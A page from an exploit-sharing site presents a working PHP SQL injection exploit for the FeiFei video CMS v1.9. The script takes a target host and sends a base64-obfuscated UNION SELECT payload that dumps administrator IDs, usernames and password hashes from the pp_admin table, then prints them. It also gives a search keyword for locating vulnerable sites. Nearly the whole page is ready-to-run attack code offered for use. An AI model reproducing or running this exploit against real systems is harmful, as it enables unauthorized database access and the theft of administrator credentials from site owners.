漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

飞飞影视系统PHP版 v1.9 injection exploit

<?php 
/** 
* 飞飞影视管理系统 SQL injection 
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans 
* keyword "Powered by www.ff84.com" 
*/
error_reporting(E_ERROR);
set_time_limit(0);

if ($argc<3) {
print_r('
------------------------------------------------------ 
Usage: php '.$argv[0].
host path host: 
target server (ip/hostname),without"http://" 
path:path to ff84cms 
Example: 
php '.$argv[0].' localhost / 
------------------------------------------------------- 
');
die;
}

$host=$argv[1];
$path=$argv[2];
$html='';

$cookie="";
$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";
$content="";
$data= "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";
$data.= "Host: ".$host."\r\n";
//$data .="Cookie: ".$cookie."\r\n";
$data.= "User-Agent: ".$agent. "\r\n";
$data.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data.= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$data.= "Accept-Encoding: gzip,deflate\r\n";$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data.= "Connection: keep-alive\r\n";
$data.= "Content-Type: application/x-www-form-urlencoded\r\n";
$data.= "Content-Length: ".strlen($content)."\r\n\r\n";
$data.= $content."\r\n";

Sendpack($data);

if (!eregi("Tpl",$html)){
// echo $packet."\r\n";
// echo $html."\r\n";
die("Exploit failed...");
}else{
$pattern="/@(.*)@/i";
preg_match($pattern,$html,$pg);
echo"$pg[1]\r\n\r\n";
echo"\r\nExploit succeeded...\r\n";
}

Function sendpack ($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 飞飞影视系统PHP版 v1.9 injection exploit

评论